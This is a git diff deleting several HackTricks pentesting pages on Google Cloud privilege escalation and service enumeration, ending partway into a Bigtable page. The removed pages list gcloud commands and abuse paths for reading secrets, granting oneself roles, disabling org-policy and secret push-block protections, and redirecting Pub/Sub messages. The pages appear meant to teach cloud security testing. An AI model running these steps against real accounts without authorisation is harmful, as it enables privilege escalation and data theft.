-{% endhint %} - -## deploymentmanager - -### `deploymentmanager.deployments.create` - -This single permission lets you **launch new deployments** of resources into GCP with arbitrary service accounts. You could for example launch a compute instance with a SA to escalate to it. - -You could actually **launch any resource** listed in `gcloud deployment-manager types list` - -In the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) following[ **script**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/deploymentmanager.deployments.create.py) is used to deploy a compute instance, however that script won't work. Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/1-deploymentmanager.deployments.create.sh)**.** - -### `deploymentmanager.deployments.update` - -This is like the previous abuse but instead of creating a new deployment, you modifies one already existing (so be careful) - -Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/e-deploymentmanager.deployments.update.sh)**.** - -### `deploymentmanager.deployments.setIamPolicy` - -This is like the previous abuse but instead of directly creating a new deployment, you first give you that access and then abuses the permission as explained in the previous _deploymentmanager.deployments.create_ section. 
- -## References - -* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md deleted file mode 100644 index 05cf0eeb1..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md +++ /dev/null @@ -1,51 +0,0 @@ -# GCP - Generic Permissions Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Generic Interesting Permissions - -### \*.setIamPolicy - -If you owns a user that has the **`setIamPolicy`** permission in a resource you can **escalate privileges in that resource** because you will be able to change the IAM policy of that resource and give you more privileges over it.\ -This permission can also allow to **escalate to other principals** if the resource allow to execute code and the iam.ServiceAccounts.actAs is not necessary. - -* _cloudfunctions.functions.setIamPolicy_ - * Modify the policy of a Cloud Function to allow yourself to invoke it. - -There are tens of resources types with this kind of permission, you can find all of them in [https://cloud.google.com/iam/docs/permissions-reference](https://cloud.google.com/iam/docs/permissions-reference) searching for setIamPolicy. - -### \*.create, \*.update - -These permissions can be very useful to try to escalate privileges in resources by **creating a new one or updating a new one**. These can of permissions are specially useful if you also has the permission **iam.serviceAccounts.actAs** over a Service Account and the resource you have .create/.update over can attach a service account. - -### \*ServiceAccount\* - -This permission will usually let you **access or modify a Service Account in some resource** (e.g.: compute.instances.setServiceAccount). This **could lead to a privilege escalation** vector, but it will depend on each case. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md deleted file mode 100644 index 60059cf64..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md +++ /dev/null @@ -1,53 +0,0 @@ -# GCP - Orgpolicy Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## orgpolicy - -### `orgpolicy.policy.set` - -An attacker leveraging **orgpolicy.policy.set** can manipulate organizational policies, which will allow him to remove certain restrictions impeding specific operations. For instance, the constraint **appengine.disableCodeDownload** usually blocks downloading of App Engine source code. However, by using **orgpolicy.policy.set**, an attacker can deactivate this constraint, thereby gaining access to download the source code, despite it initially being protected. - -{% code overflow="wrap" %} -```bash -# Get info -gcloud resource-manager org-policies describe [--folder | --organization | --project ] - -# Disable -gcloud resource-manager org-policies disable-enforce [--folder | --organization | --project ] -``` -{% endcode %} - -A python script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py). - -## References - -* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md deleted file mode 100644 index dbddd51d6..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md +++ /dev/null @@ -1,63 +0,0 @@ -# GCP - Pubsub Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## PubSub - -Get more information in: - -{% content-ref url="../gcp-services/gcp-pub-sub.md" %} -[gcp-pub-sub.md](../gcp-services/gcp-pub-sub.md) -{% endcontent-ref %} - -### `pubsub.snapshots.create` - -The snapshots of topics **contain the current unACKed messages and every message after it**. You could create a snapshot of a topic to **access all the messages**, **avoiding access the topic directly**. - -### **`pubsub.snapshots.setIamPolicy`** - -Assign the pervious permissions to you. - -### `pubsub.subscriptions.create` - -You can create a push subscription in a topic that will be sending all the received messages to the indicated URL - -### **`pubsub.subscriptions.update`** - -Set your own URL as push endpoint to steal the messages. - -### `pubsub.subscriptions.consume` - -Access messages using the subscription. - -### `pubsub.subscriptions.setIamPolicy` - -Give yourself any of the preiovus permissions - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md deleted file mode 100644 index 2d4dea5a5..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md +++ /dev/null @@ -1,45 +0,0 @@ -# GCP - Resourcemanager Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## resourcemanager - -### `resourcemanager.organizations.setIamPolicy` - -Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **organization** level. So, you can follow the same exploitation example. - -### `resourcemanager.folders.setIamPolicy` - -Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **folder** level. So, you can follow the same exploitation example. - -### `resourcemanager.projects.setIamPolicy` - -Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **project** level. So, you can follow the same exploitation example. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md deleted file mode 100644 index 9f5c5a7d1..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md +++ /dev/null @@ -1,64 +0,0 @@ -# GCP - Secretmanager Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## secretmanager - -For more information about secretmanager: - -{% content-ref url="../gcp-services/gcp-secrets-manager-enum.md" %} -[gcp-secrets-manager-enum.md](../gcp-services/gcp-secrets-manager-enum.md) -{% endcontent-ref %} - -### `secretmanager.versions.access` - -This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret): - -```bash -# Get clear-text of version 1 of secret: "" -gcloud secrets versions access 1 --secret="" -``` - -As this is also a post exploitation technique it can be found in: - -{% content-ref url="../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md" %} -[gcp-secretmanager-post-exploitation.md](../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md) -{% endcontent-ref %} - -### `secretmanager.secrets.setIamPolicy` - -This give you access to give you access to read the secrets from the secret manager, like using: - -```bash -gcloud secrets add-iam-policy-binding \ - --member="serviceAccount:@$PROJECT_ID.iam.gserviceaccount.com" \ - --role="roles/secretmanager.secretAccessor" -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md deleted file mode 100644 index 8ef9a508e..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md +++ /dev/null @@ -1,115 +0,0 @@ -# GCP - Sourcerepos Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Source Repositories - -For more information about Source Repositories check: - -{% content-ref url="../gcp-services/gcp-source-repositories-enum.md" %} -[gcp-source-repositories-enum.md](../gcp-services/gcp-source-repositories-enum.md) -{% endcontent-ref %} - -### `source.repos.get` - -With this permission it's possible to download the repository locally: - -```bash -gcloud source repos clone --project= -``` - -### `source.repos.update` - -A principal with this permission **will be able to write code inside a repository cloned with `gcloud source repos clone `**. But note that this permission cannot be attached to custom roles, so it must be given via a predefined role like: - -* Owner -* Editor -* Source Repository Administrator (`roles/source.admin`) -* Source Repository Writer (`roles/source.writer`) - -To write just perform a regular **`git push`**. - -### `source.repos.setIamPolicy` - -With this permission an attacker could grant himself the previous permissions. - -### Secret access - -If the attacker has **access to the secrets** where the tokens are stored, he will be able to steal them. For more info about how to access a secret check: - -{% content-ref url="gcp-secretmanager-privesc.md" %} -[gcp-secretmanager-privesc.md](gcp-secretmanager-privesc.md) -{% endcontent-ref %} - -### Add SSH keys - -It's possible to **add ssh keys to the Source Repository project** in the web console. It makes a post request to **`/v1/sshKeys:add`** and can be configured in [https://source.cloud.google.com/user/ssh\_keys](https://source.cloud.google.com/user/ssh_keys) - -Once your ssh key is set, you can access a repo with: - -{% code overflow="wrap" %} -```bash -git clone ssh://username@domain.com@source.developers.google.com:2022/p//r/ -``` -{% endcode %} - -And then use **`git`** commands are per usual. - -### Manual Credentials - -It's possible to create manual credentials to access the Source Repositories: - -
- -Clicking on the first link it will direct you to [https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform\&state\&authuser=3](https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform\&state\&authuser=3) - -Which will prompt an **Oauth authorization prompt** to give access to **Google Cloud Development**. So you will need either the **credentials of the user** or an **open session in the browser** for this. - -This will send you to a page with a **bash script to execute** and configure a git cookie in **`$HOME/.gitcookies`** - -
- -Executing the script you can then use git clone, push... and it will work. - -### `source.repos.updateProjectConfig` - -With this permission it's possible to disable Source Repositories default protection to not upload code containing Private Keys: - -```bash -gcloud source project-configs update --disable-pushblock -``` - -You can also configure a different pub/sub topic or even disable it completely: - -```bash -gcloud source project-configs update --remove-topic=REMOVE_TOPIC -gcloud source project-configs update --remove-topic=UPDATE_TOPIC -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md deleted file mode 100644 index abbec6712..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md +++ /dev/null @@ -1,48 +0,0 @@ -# GCP - AI Platform Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## [AI Platform](https://cloud.google.com/sdk/gcloud/reference/ai-platform/) - -Google [**AI Platform**](https://cloud.google.com/ai-platform/) is another "**serverless**" offering for **machine learning projects**. - -There are a few areas here you can look for interesting information like models and jobs. - -```bash -# Models -gcloud ai-platform models list -gcloud ai-platform models describe -gcloud ai-platform models get-iam-policy - -# Jobs -gcloud ai-platform jobs list -gcloud ai-platform jobs describe -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md deleted file mode 100644 index 0b4eea5f9..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md +++ /dev/null @@ -1,71 +0,0 @@ -# GCP - API Keys Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -In Google Cloud Platform (GCP), API keys are a simple encrypted string that **identifies an application without any principa**l. They are used to **access Google Cloud APIs** that do not require user context. This means they are often used in scenarios where the application is accessing its own data rather than user data. - -### Restrictions - -You can **apply restrictions to API keys** for enhanced security. For example, you can restrict the key to be **used only by certain IP addresses, webs, android apps, iOS apps**, or restrict it to **certain APIs or services** within GCP. - -### Enumeration - -It's possible to **see the restriction of an API key** (including GCP API endpoints restriction) using the verbs list or describe: - -```bash -gcloud services api-keys list -gcloud services api-keys describe -gcloud services api-keys list --show-deleted -``` - -{% hint style="info" %} -It's possible to recover deleted keys before 30days passes, that's why you can list deleted keys. 
-{% endhint %} - -### Privilege Escalation & Post Exploitation - -{% content-ref url="../gcp-privilege-escalation/gcp-apikeys-privesc.md" %} -[gcp-apikeys-privesc.md](../gcp-privilege-escalation/gcp-apikeys-privesc.md) -{% endcontent-ref %} - -### Unauthenticated Enum - -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md" %} -[gcp-api-keys-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../gcp-persistence/gcp-api-keys-persistence.md" %} -[gcp-api-keys-persistence.md](../gcp-persistence/gcp-api-keys-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md deleted file mode 100644 index 4cb12e714..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md +++ /dev/null @@ -1,63 +0,0 @@ -# GCP - Batch Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -**Google Cloud Platform (GCP) Batch Service** is designed for running **large-scale batch computing workloads**, automating the management, scheduling, and execution of batch jobs across scalable cloud resources. This service simplifies operations and optimizes costs by allowing users to leverage preemptible VMs and integrates seamlessly with other GCP services for comprehensive batch processing workflows. It's ideal for data processing, financial modeling, and scientific simulations. - -### Service Account - -Although (currently) it's not possible to select the SA that the batch job will be executed with, **it'll use the compute SA** (Editor permissions usually). - -## Enumeration - -{% code overflow="wrap" %} -```bash -# List jobs -gcloud batch jobs list - -# Get job info -gcloud batch jobs describe --location - -# List tasks -gcloud batch tasks list --location --job - -# Gte info of tasks executions -gcloud batch tasks describe projects//locations//jobs//taskGroups//tasks/ -``` -{% endcode %} - -## Privilege Escalation - -{% content-ref url="../gcp-privilege-escalation/gcp-batch-privesc.md" %} -[gcp-batch-privesc.md](../gcp-privilege-escalation/gcp-batch-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md deleted file mode 100644 index 7d8c2c5e7..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md +++ /dev/null @@ -1,58 +0,0 @@ -# GCP - Bigtable Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
